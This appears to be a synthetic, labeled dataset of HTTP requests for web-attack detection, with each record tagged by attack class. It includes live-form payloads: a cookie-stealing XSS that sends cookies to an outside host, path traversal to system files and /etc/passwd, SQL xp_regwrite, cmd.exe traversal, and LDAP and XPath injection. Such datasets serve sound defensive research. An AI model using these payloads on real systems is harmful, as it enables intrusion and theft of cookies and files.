If-Modified-Since: Thu, 11 Nov 04 14:44:42 GMT
If-Unmodified-Since: Mon, 27 Apr 09 16:38:08 GMT
If-Match: *
If-None-Match: "TcZuF_-osidmp9Dh@NG"
If-Range: "1947u5Zn0GiwsfB"
Max-Forwards: 010
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest username="sudmt"
Authorization: Basic YWUwcjpIdE5tZTl5
Range: -5103
Referer: http://BP8hss.it/js50r/fsvi/isnTeed/eet68t53.nsf
TE: deflate;q=0.0,gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.2 (Windows; U; WinNT 0.6; yc-hn; rv:5.5.3) Gecko/23693737
UA-CPU: Sparc
UA-Disp: 464,9739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: usna/0.3 www.stumf.jpeg, 7.6 www.htle0ei.gif:9
Transfer-Encoding: identity
Upgrade: alcth4/9.0, omen/8.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35668
Start - Id: 37278
class: LdapInjection
PUT /nf_b.puJfka5P.G/bQBS0gqBWF.nqoJ/FX.js? HTTP/1.0
Content-Length: 96
Content-Language: yac6
Content-Encoding: identity
Content-Location: http://www.sWssne.com/h5ar/nangy/votouo.swf
Content-MD5: c2hicmVmc2Z0OWhpdXR3ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 16:06:40 GMT
Last-Modified: Thu, 14 Jan 10 12:06:43 CET
Host: www.arnxe.cz
Connection: ytJekNi
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=81
Client-ip: 25.97.10.82
Cookie: p6UL@Q8VR=lnhuty7irtd:j~
Date: Sun, 10 Jan 10 24:07:14 UTC
ETag: W/"iO8TiQMvtlwQbS1cpSK"
From: uWotmh@iaat.org
If-Modified-Since: Tue, 02 Nov 04 05:16:04 UTC
If-Match: "m-bNPi9tqD9qSf7vIg"
If-None-Match: *
If-Range: "FJhG62oiZNWFtJwvyH5"
Max-Forwards: 93
Pragma: no-cache
Authorization: NTLM S2VuZmQ0aWFveGl0bnJvcmVoYjJneTl0YXAxZWN0dGlybXJzZ3RzNDRpNGI=
Referer: http://www.ttnyd.net/0osd.sh
Trailer: TE
User-Agent: er)(   | (usa=*)
UA-Disp: 2933,1211,32
Warning: 883 www.fRose.tiff "esne" "Sun, 08 Jun 08 18:40:43 UTC"
X-Forwarded-For: 62.116.110.58
X-Serial-Number: 037823

4emiamaRo5o=anr6e&nynhpRs=w2$reIntrn&7noryaifm=0&dyeni=xosloumal'nta&DDVcw08QjM=rtlegar9goat

End - Id: 37278
Start - Id: 45820
class: PathTransversal
GET /mvdUUDsw@d/N-echoYEwiEEq.png?l6d=pnzlwi%3D%5Drn8azsu&EexcH=tiot%7E%3A+3mlo%3A&cnniItswiktbs=cg%5Doe%3Baeservicesed%28u&att=tQQe4%40U&budedocesceme=sth&notew5=h%3A%5C%5CWINNT%5C%5Cwin.ini&ua=ez&T0euRnsceHFGrt=b%7C&5xes2ni3dmtnk5=9pwmqdt3CNJk HTTP/1.1
Host: 117.253.190.189
Connection: szsssnpc
Accept: */*
Accept-Charset: cp-936;q=0.9, iso-2022-kr, windows-1253;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Cookie2: $Version="25"
Date: Sat, 01 Jan 05 20:49:09 UTC
If-Unmodified-Since: Sat, 06 Mar 04 08:55:29 GMT
If-None-Match: *
If-Range: "7uGw0b0NZm1mbziUue-"
Max-Forwards: 2337
Proxy-Authorization: NTLM YXJhZmpjaHJlemlsZWNwbXJ0YXVuc2VlaUF0YWQwRXNSb3R5Y2w=
Authorization: oueerc rde1i12a=6ihs
Referer: /aIol.pl
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 8.8; hi-lE; rv:8.6.4) Gecko/18445448
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Upgrade: tDye/1.7, Ltt8s/3.6, S1tao/2.0, qyRa2/0.0
X-Serial-Number: 72162010

null

End - Id: 45820
Start - Id: 47892
class: XSS
GET /h9m9Nuv4bn/tDOl0XqfCsFydnMQ/ty_0Ent6UeY5p0q8/tx9ItxImubIA1I/or97D2J96/tszLrST2kWPE@L9JVaNu/4Cz/rxK.kGBTg4lp.mspx?Ldiemotrefr0ra=tofeo&s4=119&9eopdAtiiIT=scBr23ou&arot=o7tahnihfossd&ueoatlssbn=%3D%29&iemeis=98&@o_iM5fPMg2O=ngam&uoboeebTenttleg=%29eit&y0a4llo=2975566&cee0e1=7017125711&2cmdxp_ftp-phpctP=cAVCt0ZzzPL&dt=y%5D&sninov=y6+f+&zeoh1tlasmbx=r9aitm&oCadIy=%3Cimg++dynsrc+++%3D++++%22+javascript%3A+++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.ro.com%2Fcgi-bin%2Fermetanide.cgi%27%2Bdocument.cookie%29%3B%5D++%22%3E HTTP/1.1
Host: www.t6ftgalt.com
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesesimp;q=0.4, x-mac-turkish;q=0.9, windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8
Client-ip: 2.6.142.235
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Sat, 10 Dec 05 13:27:03 GMT
ETag: "z@DKmFLK17Dvv.t9"
Expect: 100-continue
From: clrwp@noorqoy.ch
If-Modified-Since: Mon, 05 Nov 07 02:03:08 UTC
If-Unmodified-Since: Mon, 18 May 09 05:45:11 GMT
If-Match: *
If-None-Match: *
If-Range: "X_BqJYcW00mJ5D4lCoY"
Max-Forwards: 2306
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Basic OHRvZGE6RTZ0dA==
Range: -43,-33,199214-
Referer: /bvnp/ffhPaoj1/taay7ta/tito.jpeg
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: If-Range
User-Agent: r71oa2g http://www.6epf.st
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 084x9415
Via: 1.8 246.164.138.81
Transfer-Encoding: oOtNne; ig9m=sooe
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 47892
Start - Id: 45645
class: PathTransversal
GET /oUA1.--i1UUoM_Ty/i5gi_qRxJzQI/0z4.w_9m/opda7est/DfTUPfK/9Iq/oAumMl-2.mspx?THsslo=82OQvUm&WloimgtoRYin86=8&plGrqsr4iwte=72&gpA_Cmr=3192&onib6Ruta5r=%5CWINNT%5Csystem.ini&ew=amipy%40tZmjz&c3ea8rdnwwnlyuo=Ad+Etcidtd8uEtiiet&nhWh7=0308630&bgyheanrqmhq=eoeed&Tptb=70&rrsisiygbuwTEt=P4pel5oOiaUlter&2knieicleslwes=awV&rfpigieermussn=61684&s9YDfX1vbb%u1=hvan&ui=233393 HTTP/1.1
Host: 64.94.60.59
Connection: keep-alive
Accept: text/html;q=0.7
Accept-Charset: cp-932;q=0.7, koi8-r, iso-8859-7;q=0.0, x-mac-chinesesimp, iso-8859-8
Accept-Encoding: 
Accept-Language: ooakeT-n5aa, ljqttj-6;q=0.2, eoha4z-Aetepb, adu4m-l7stt;q=0.5, I-jh
Cache-Control: min-fresh=2800
Client-ip: 168.189.41.184
Cookie: E_Z@M3OXol=3343;hrl1erunlpryl=3t1digyutetetonen;JRJimgbChS=25504;3soivleeawlioo=veoEw
Cookie2: $Version="85"
Date: Tue, 27 Jun 06 05:12:13 UTC
ETag: W/"a7BEiQfYTaCL7@ec4s"
Expect: 8tgi=set7eote;8iscgtm
From: f6eo@ixbm.net
If-Modified-Since: Wed, 14 Jun 06 17:32:50 CET
If-Unmodified-Since: Fri, 08 Jul 05 04:39:23 UTC
If-Match: "640EYh5ENA7PUMw2St"
If-None-Match: "CsVD4hVl9bZ83fJ"
If-Range: *
Max-Forwards: 599
MIME-Version: 6.6
Pragma: oa7Trtdv='wedv'
Proxy-Authorization: NTLM amUxaXN1c3I0ZW1tc3NuQW90MW9kanNOaW5vZWk2Z281aTBuTXRhb2Q=
Authorization: Digest realm
Range: -5753
Referer: http://www.HorN.st/2lloe.dll
TE: trailers,gzip;q=0.6
Trailer: Upgrade
User-Agent: Mozilla/2.7 (Windows; U; WinNT 4.4; An-en; rv:9.6.4) Gecko/78657976
UA-CPU: PowerPC
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/4.1 www.lutK.gif, HTTP/9.1 www.1scahsr.htm
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 06916624416641934220
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45645
Start - Id: 47900
class: XSS
GET /iQ2tmxk@nmsjMxosy/tAQ/Randa4FvUmksock_stream@_sY/h3Hj_ImJAcYosKIVvefp/nwtmpcmd@wsiGboh_IB/mome6lu/rutalisK16tlidirdtPs/larapv9mrngkhrs.sh?6Woheyr5Puts=aXqBl%40Y&OPusrNlinkp=h34wlGHpr3&.a6jqFxa=tMjecZ&es2jthgpdADro=%3Cdiv+++++style+++%3D+%22background-image%3A+url%28javascript%3A+%5Balert+%28%27eDEogs%27%29%3B%5D%29%3B++++%22%3E HTTP/1.0
Host: 221.218.80.82
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: koi8, iso-8859-9;q=0.1, hz-gb-2312;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 204.130.234.159
Cookie: n8ehldh7pT6ed=vstdinrtafromlogssr'ol7+li7;tih73ren=93|ia7ilibnertCeni;g-B0743S7qq=659;sw=58;eIsleel=632513;oaqrnRRvee=24933
Cookie2: $Version="42"
Date: Fri, 27 Feb 09 10:01:24 GMT
ETag: W/"sMWA4udOhaWo3S40bpz"
Expect: sOtttdo=Spchzlyl;6airhYu=iAr0dj
From: rigu@deao.net
If-Modified-Since: Mon, 23 Jul 07 11:48:31 GMT
If-Unmodified-Since: Mon, 14 Apr 08 10:03:09 CET
If-Match: "bvb3LuTjSIw@qID"
If-None-Match: "uFA8eu01lA2N9_OH"
If-Range: "JRA3Z@PzKBKNJHK7pU"
Max-Forwards: 0865
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest algorithm=MD5
Range: 53066-01
Referer: http://acr8rs.it/evTr5bce/enwye/fwb9.swf
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/6.0 (Windows; U; Windows NT 0.1; he-jl; rv:6.7.3) Gecko/31948436
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: pRlae
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 274 128.194.66.58 "9hsdoz" "Fri, 21 Jan 05 16:59:18 CET"
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47900
Start - Id: 49585
class: XPathInjection
GET /j.pksD2pt/tpetp1nmaoetxejsl/ycdsTnzoayre5ieoiJi/0wget.tiff?upnEi=66&eruFwEduNhoa=1866666930&9hnnl=0911237&2ritnldstHm=ehnhU&awrxt5EgTgcse=4&tneth=gtnn7eSe%27+++++or++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28++++i++++%2B+j+%2B++k++++%2B+l%2B++1%29%5D++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+%27dtorvt%27%3D++++%27++++hleu%27+++++or&Ic.X=twiP_&alprAa=owHmf16HE&dapsae=odnRat HTTP/1.1
Host: 169.44.72.109
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.9, x-mac-greek, windows-1258, euc-jp, euc-tw;q=0.9
Accept-Encoding: *
Accept-Language: l-nramndrg, d-a6lan;q=0.7, cioe-hhs, bzm1-7himdx
Cache-Control: min-fresh=4683
Client-ip: 217.150.196.230
Cookie: YiK4pQ=8;log9stylerservices5dxBu=i9iYOW
Cookie2: $Version="15"
Date: Sun, 02 Jul 06 13:44:39 UTC
ETag: W/"PmcmEKRs84Qlqdnx_"
Expect: zaa9l=tqnd;iaotty
From: vdtta@swAetit3jt.gov
If-Modified-Since: Fri, 20 Oct 06 16:10:16 GMT
If-Unmodified-Since: Sun, 29 Nov 09 19:17:13 CET
If-Match: "L0Mw.7oWdTzNddcL3E"
If-None-Match: *
If-Range: *
Max-Forwards: 1871
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic dzljSGVpcTo3bHRl
Range: 124-314534,89-
Referer: /lhrd5/tytNt/onaoyd.tar.gz
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.4 (compatible; MSIE 4.3; Linux i386; ert5ta)
UA-CPU: PowerPC
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: legrxn/8.4 188.26.50.59
Transfer-Encoding: identity
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49585
Start - Id: 41030
class: SqlInjection
GET /akUjiLtm33jrveu-ph7/r@6Vhv0n@-/eSyBJB/one/am67srOdema/1hb/Lo/ovSmr1OP@mNHkVTwCQRv/iUdcWF_c.xLlX.asmx?gJctH8hrct=42212691&qhbiz=i3ssesdsy&3ot=0670910&hdvnr9tesejrn=eyagtRBlrepeahant&ofhibAe=ahpro&8ispienuid0=mem&rpo59ao=exec++++xp_regwrite++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%272thh%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&L3aotistco3i3O=h0d%2Bulibaqtpositiontaotq&Ai.O_=lyfdfZX2A&aafaLazaO4n4=e%3Fdautoexec8p&f555n5=eh HTTP/1.0
Host: www.Pntoe3xe.st
Connection: close
Accept: audio/x-wav;q=0.3, text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-nchseV;q=0.3, 4depred-raslema
Cache-Control: no-transform
Client-ip: 55.129.155.218
Cookie: input77var=enheloo;raaTmdmoiu31ch3=o3sshopnelwpfin2ek;6eeiropalaroni=aChglk;UiAdFls=unioncanf]3eae=to;hT3IQX@h5copy.g=31213
Cookie2: $Version="1"
Date: Sat, 30 Jul 05 23:33:10 CET
ETag: W/"2RZ010VysKkvN0NXp5"
Expect: yuEtt
From: spbhn@ispeCheey.net
If-Modified-Since: Tue, 17 Feb 09 14:47:11 CET
If-Unmodified-Since: Tue, 23 Nov 04 05:32:03 CET
If-Match: *
If-None-Match: "gGGDYPMk-9ma22OqoT"
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 4
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 770-,-93926
Referer: /stdeew/hsjyei.dll
TE: gzip;q=0.1,deflate;q=0.3
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 8.5; 9l-np; rv:9.8.7) Gecko/19693763
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: dlbsd/2.7 45.187.138.214
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 757 www.ISNmy.shtml "drueynihhx3tslbrems" "Tue, 22 Sep 09 13:07:10 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41030
Start - Id: 48645
class: XPathInjection
PUT /2qFCeWSQBzbDXReJ20_q.css? HTTP/1.1
Content-Length: 245
Content-Language: haer,niapema,srsomce
Content-Encoding: deflate
Content-Location: /asndtC/hst3d/ltwot.dll
Content-MD5: eXRybkVjNnRhaGhtclN0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 04:29:17 CET
Last-Modified: Sat, 14 Oct 06 05:18:11 CET
Host: www.AlhPhvdse.org
Connection: elfga
Accept: image/png;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.9
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 41.88.127.250
Cookie: uliaa=njOIs2Cbq;olEztlbrf=N0e;droptmpEB@MNQND=uiitSez
Cookie2: $Version="353"
Date: Fri, 05 Mar 04 11:31:02 UTC
ETag: W/"xQ73VO@JK@4R4B4"
Expect: yl8oRfl
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Sun, 31 Dec 06 23:38:06 UTC
If-Match: "sJecmBHBknBckAN3Ivo"
If-None-Match: "b93NWfsgkX2bkJxx0x"
If-Range: Mon, 16 Oct 06 03:22:30 CET
Max-Forwards: 2
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: /reieud/7pea/l5i3S/nk1de/u0vIov.exe
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: Mozilla/0.7 (Windows; U; Win98 5.0; rs-ey; rv:0.4.1) Gecko/11458938
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: 1.2 www.shee1de.js:27, cbcog/8.1 www.bEleb.png, 2.6 www.uuodo.shtml
Transfer-Encoding: compress
Upgrade: 4iiutb/0.5, Iima/4.6, uhhmar/1.8, nmohS/4.1, tm3A/2.3
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tuato=iq&eBunionypJonhtpassyf=w0nki& $&KQluIi4is0mjas=wosatoleobis&ntr=ce(t8snsrr&eefftu=u7iE'    or Gr/aDh/child::node()[processing-instruction()=7]   or  'oay' =    '&jEEN8-=akgvklDlyaet&deriyraei=1&tee=00

End - Id: 48645
Start - Id: 44146
class: OsCommanding
GET ..��...��..��..��..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 135.152.58.173
Connection: close
Accept: audio/*, video/*
Accept-Charset: x-mac-korean;q=0.4, us-ascii;q=0.1, x-mac-arabic;q=0.9, koi8
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 39.47.60.88
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="3"
Date: Sat, 22 Jul 06 15:26:07 UTC
ETag: W/"j11dUi1m7aDRxn7yYAcp"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 11 Aug 07 08:00:30 UTC
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: *
If-Range: "DX5982-v6mPIKEx"
Max-Forwards: 97
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM c2xzcXJBb0l6U3NlVGN2aWVvOTFNUzN0c29PNnVlYUhyZTkzYWZBanQ0
Range: 815-,644-20793
Referer: /ssRu/srwmjtsn/aifyhe/ec1o/iieTl.rar
TE: gzip,deflate;q=0.7,trailers
Trailer: Date
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 2.8; re-dd; rv:1.6.2) Gecko/19913332
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 3.3 74.6.233.37, FTP/4.3 205.130.142.7, tn3/0.6 www.re0pe.jpeg
Transfer-Encoding: ha1tyt
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44146
Start - Id: 36011
class: PathTransversal
POST /8xicYH8nug_ien/oz90hh5mX/kqLwjZu@MMcvp.tiff? HTTP/1.1
Content-Length: 86
Content-Language: rhn,a,iflhenrn
Content-Encoding: compress
Content-Location: /hncnr4I.wav
Content-MD5: ZWhobnRvZG9oZW5hOWVlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 May 08 21:45:12 CET
Last-Modified: Mon, 12 May 08 08:34:46 CET
Host: 15.229.176.153
Connection: onuAreQ
Accept: image/png;q=0.3, application/zip, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Cookie: 0kiradixeh7hes=locationt)%TtSepvsio E;vt_wTJZZP=2337;OqfromOjaJm3l=owa;aoeastairrdg=t6eT
Cookie2: $Version="1"
Date: Wed, 03 Dec 08 01:18:50 CET
From: snploe@2Ooln.biz
If-Modified-Since: Sun, 05 Aug 07 16:10:00 GMT
If-Unmodified-Since: Thu, 17 Mar 05 15:13:03 GMT
If-None-Match: *
If-Range: Tue, 06 Jan 04 19:07:50 GMT
Max-Forwards: 056
Pragma: 73='h'
Authorization: Digest nc=Fb9cDdB3
Range: 0748-49,25526-,627-90
Referer: http://ahzba.fr/gdtrtS.pl
User-Agent: ektsdnK/4.0.5
UA-Disp: 886,689,8
Via: 9.1 www.omfutHt.jpeg
Transfer-Encoding: deflate
Warning: 658 108.103.139.154 "Iuht" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a3ise=jyHP&7gp=dUqJqajsof&8egihalithn=..\..\..\..\..\..\WINNT\system.ini

End - Id: 36011
Start - Id: 39633
class: SSI
GET /oeql4Wml-visVMG/tvr6/eeop.png?o8crerntWtIj=oqnrae&aLsotroghpOeyr=%3C%21--+++++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&6FJjxXE.Lbody=systemeg&uKdgdqm=sc7ar&adtdlo=Aelid%29+tetiaG&etstlut=waIo7qhrtadepero1us%26&aMr=fhWJ&aroicUoikoynd=082655&W1CtPR5=78728470&Nelnoifih=ebodymh+dy%266+r%3Acbl&ndeeft2Ds=Me+Qtor&aotnweACh=7977249&7samDS=101713123&-c1QJ60U=0&le8eUodnldysBo=htmpduekl+ HTTP/1.0
Host: www.3titxt3h.ch:80
Connection: keep-alive
Accept: application/*, video/quicktime;q=0.1
Accept-Charset: euc-tw, x-mac-arabic;q=0.7, iso-8859-7;q=0.4, x-mac-korean, cp-936
Accept-Encoding: compress;q=0.8, deflate, deflate
Accept-Language: ientEec2-eotl;q=0.2, ra-2, nua9ai8-ehSa;q=0.8
Cache-Control: only-if-cached
Client-ip: 225.141.13.194
Cookie: o2ouvbei=MbeEcrtm;gin5seh=2713;ldcua4Ylw=almsolrcpY4at;bdRnt=8
Cookie2: $Version="9"
Date: Mon, 07 Mar 05 16:26:16 GMT
ETag: "@Py@vCbgWDBllPns"
Expect: urn5i=nrpg
From: nneTpp@ds2o4khd.org
If-Modified-Since: Wed, 24 Mar 04 21:53:15 CET
If-Unmodified-Since: Wed, 13 Jul 05 23:05:22 GMT
If-Match: "5649_BVinmGcR92K"
If-None-Match: *
If-Range: "5lhYstAr7mTqXswsIh"
Max-Forwards: 375
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: NTLM dHloc3JDdGF0ZWlydGVvUlRzc3dieTBnZWh0ZWQzOXBrcg==
Range: -8469,086240-,65-225201
Referer: /itCec.mspx
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: Mozilla/9.3 (Windows; U; Win98 7.0; tr-vt; rv:7.2.4) Gecko/39537545
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: 3.3 www.4nva.shtml, aocias/0.5 208.21.81.107
Transfer-Encoding: gzip
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 49.36.83.109
X-Serial-Number: 963759141034519657
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39633
Start - Id: 38633
class: LdapInjection
GET /ah@Db2AmjqjvXsg08MY.swf?swk=d1f&eteeA=uO%40bW&moOhnhacc4=smlncY44AelB&G5Z9OItr7O=ronwhwt&frc=%24+Asa4mhttpps&6ntjatiab=like&tau7=%29+++%28++%7C+%28+++cn%3D*o+++%27brien*+%29%28mail+%3D*o%27brien*%29&Pm=s&seuheoqtET=ef1afiooftEsp0fh&1ea=q1vEXo&qhimaueEaXwtide=1nmsRr5&eenb9fthn=UuByea&@vWQc=ehsgw0gatt HTTP/1.1
Host: www.omnoivemah.de
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-japanese
Accept-Encoding: *;q=0.4
Accept-Language: ezx4aeiy-nez, Ome-rlD, Na5saw-tplje
Cache-Control: 8xmotuen=resposdt
Client-ip: 208.123.158.22
Cookie: rireee5ehalr=0132;mr=sXKXyXKia2QE
Cookie2: $Version="0"
Date: Thu, 01 Feb 07 24:25:56 GMT
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Tue, 30 Dec 08 07:41:44 UTC
If-Match: "-BvHRjm7@GtoREvJO"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: Fri, 02 Apr 10 04:03:31 GMT
Max-Forwards: 3
MIME-Version: 8.5
Pragma: 9l3b='l16tnr'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 25834-,48-325537
Referer: http://www.e8beiahq.fr/i9pnscod/t53moe1c/aE1Iace/8u4ple2.png
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/6.8 (X11; U; SunOS sun4u 4.3; LL-u4; rv:5.6.0) Gecko/22398994
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 873 www.crqmw.shtml "oisUjyPexehaoceb" "Mon, 12 Nov 07 06:17:25 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 53440991
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38633
Start - Id: 36344
class: PathTransversal
GET /aMh-og8A7rebft/sPUd0tmpXIbetween.jpg?qgr5Rro3saokgm=3s++s&_mochaXncAs0d=Iilocation%2Blo+vur&oYrsythnr=yS5FxWRxJP%40&7e69cscno=eZ3j0vdk2XaU&pndf=ti&d4raun=airo&e7re4sb0ar=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&dacrtgr=d%3Cnnpswindow.opentnetcat HTTP/1.0
Host: 70.42.40.1:586
Connection: close
Accept: audio/x-wav;q=0.0, image/*;q=0.7
Accept-Charset: iso-8859-9, x-mac-arabic, x-mac-icelandic, euc-kr;q=0.6, iso-8859-9;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=33
Client-ip: 59.25.255.93
Cookie: e1nndsnh7gein=9srg46_RRT;laobjectn_9kZ2mN=ntcar;achrqYstdsoeais=3841;rnadhtAgetzen=oTrHahnaOarEsi;obghuvwcEftL=nne
Cookie2: $Version="42"
